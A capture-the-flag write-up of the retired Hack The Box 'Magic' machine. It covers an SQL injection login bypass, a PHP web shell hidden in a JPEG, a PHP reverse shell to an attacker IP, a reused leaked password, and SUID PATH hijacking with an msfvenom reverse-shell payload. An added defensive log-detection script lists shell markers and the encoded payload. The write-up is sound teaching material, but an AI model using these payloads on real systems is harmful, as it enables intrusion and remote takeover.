Hack The Box — Magic Write-up

Mayk
3 min read · Aug 23, 2020


Summary

Magic is a medium-difficulty Linux box from the Hack The Box platform that was retired on 22 August 2020 at 19:00:00 UTC. The box offers interesting attack vectors to exploit, such as SQL injection, PHP code injection into an image file, and more.

Scanning and Enumeration

After adding an entry to our /etc/hosts file, we perform a typical scan to check which ports are open.

$ ports=$(sudo nmap -p- --min-rate=1000 -T4 magic.htb | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
$ sudo nmap -p$ports -T4 -Pn -A magic.htb

This reveals an OpenSSH 7.6p1 server running on port 22 and Apache httpd 2.4.29 on port 80.

From the main page, we can see a login page pointing to http://magic.htb/login.php.

[Image: the login page with username and password fields]

After some basic SQL injection tests, this form turns out to be vulnerable. We can bypass the authentication mechanism by injecting the following value into the username field:

admin' AND 1234 = 1234 -- abc

Once logged in, we get access to a page that allows us to upload images to the website.

Getting a Foothold

Since we are now able to upload files to the server, our next goal is to upload a backdoor so that we can interact with the system.

This stage involved some trial and error, because the server performs input validation on uploaded files. For instance, simply sending a PHP file with a double extension such as backdoor.php.jpg, or tampering with the HTTP headers of the upload request, won't work.

One approach that works for this target is injecting PHP code into a JPEG image in a way that survives the processing done by the PHP GD built-in function imagecreatefromjpeg(). This approach is described in more detail here, and a tool to accomplish it can be found at https://github.com/dlegs/php-jpeg-injector.

With an image to infect at hand, run something like:

python gd-jpeg.py cat.jpg '<?php if(isset($_REQUEST["cmd"])){echo "<pre>";$cmd = ($_REQUEST["cmd"]);system($cmd);echo "</pre>";die;}?>' magic-cat.php.jpg

After uploading magic-cat.php.jpg to the server, we can run arbitrary commands passed as the value of the cmd parameter, for instance:

http://magic.htb/images/uploads/magic-cat.php.jpg?cmd=whoami.

To get a reverse shell from the target back to our machine, we can run:

php -r '$sock=fsockopen("10.10.15.15",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Before submitting this command through the web shell, though, we should URL-encode it as follows:

$ hURL -U -f url
Original file :: url
URL ENcoded :: php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

The final URL is then: http://magic.htb/images/uploads/magic-cat.php.jpg?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.

Sending this request to the server gives us a shell as user www-data.
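From the defender's side, the request chain above leaves a clear trail in the Apache access log. The following Python script is an added example, not part of the original write-up: it flags requests to uploaded files whose name carries a script extension before the image extension, and requests whose query string carries a command parameter or shell-like content, decoding the percent-encoded payload so an analyst can read it. The log lines are constructed to mirror the requests in this post and are not a capture from the real box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines modelled on the request chain in this
# write-up; they are not a capture from the real box.
SAMPLE_LOG = """\
10.10.15.15 - - [22/Aug/2020:20:01:03 +0000] "POST /upload.php HTTP/1.1" 302 0
10.10.15.15 - - [22/Aug/2020:20:01:10 +0000] "GET /images/uploads/magic-cat.php.jpg?cmd=whoami HTTP/1.1" 200 512
10.10.15.15 - - [22/Aug/2020:20:01:40 +0000] "GET /images/uploads/magic-cat.php.jpg?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 HTTP/1.1" 200 0
10.10.15.15 - - [22/Aug/2020:20:02:00 +0000] "GET /images/uploads/cat.jpg HTTP/1.1" 200 48211
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*"')
# A script extension buried before the final (image) extension, e.g. x.php.jpg
DOUBLE_EXT_RE = re.compile(r'\.(php\d?|phtml|phar)\.[a-z0-9]+$', re.IGNORECASE)
# Strings that have no business in a parameter sent to a static image
SHELL_MARKERS = ("fsockopen", "/bin/sh", "php -r", "whoami", "bash -i", "nc ")
CMD_PARAMS = {"cmd", "c", "exec", "command"}


def analyze_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    reasons, decoded = [], {}
    if DOUBLE_EXT_RE.search(url.path):
        reasons.append("double_extension")
    # parse_qs percent-decodes values, so the encoded payload becomes readable
    for name, values in parse_qs(url.query).items():
        for v in values:
            if name in CMD_PARAMS or any(s in v for s in SHELL_MARKERS):
                reasons.append("command_in_query")
                decoded[name] = v
    if not reasons:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": url.path,
            "reasons": sorted(set(reasons)), "params": decoded}


def analyze_log(text):
    """Run analyze_line over every line of the log and keep the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], f["reasons"], f["params"])
```

Only the two requests to magic-cat.php.jpg are reported; the upload POST and the plain cat.jpg download pass through untouched.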

Owning User

With some basic filesystem enumeration, we can find a file named file.sql containing the following line: INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');

Also, looking at either the /home directory or the /etc/passwd file, we see that there is a user called theseus on the system.

Simply run su theseus and provide the password Th3s3usW4sK1ng to own the user and get your flag: de****************************14.

Owning System

By enumerating the system a little more, we can find a SUID binary file at /bin/sysinfo for which we have execution permission. This is a compiled program that shows us some system information.

Running strings on that file shows that it calls several system command-line tools without specifying their full path. Thus, we can prepend /tmp to our PATH environment variable and plant a malicious file there with the same name as one of the tools called by sysinfo.

For that task, we first create a payload with msfvenom:

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.15.15 LPORT=5555 -f elf > free

Then, we upload this binary to the target's /tmp directory and execute /bin/sysinfo. Now, instead of running the system's free command, which shows information about system memory, the program executes our malicious file placed at /tmp/free, giving us a root shell.

Enjoy your root flag 76****************************5a!

Written by Mayk

Offensive security practitioner for fun and open source enthusiast. Sometimes I research or break something.
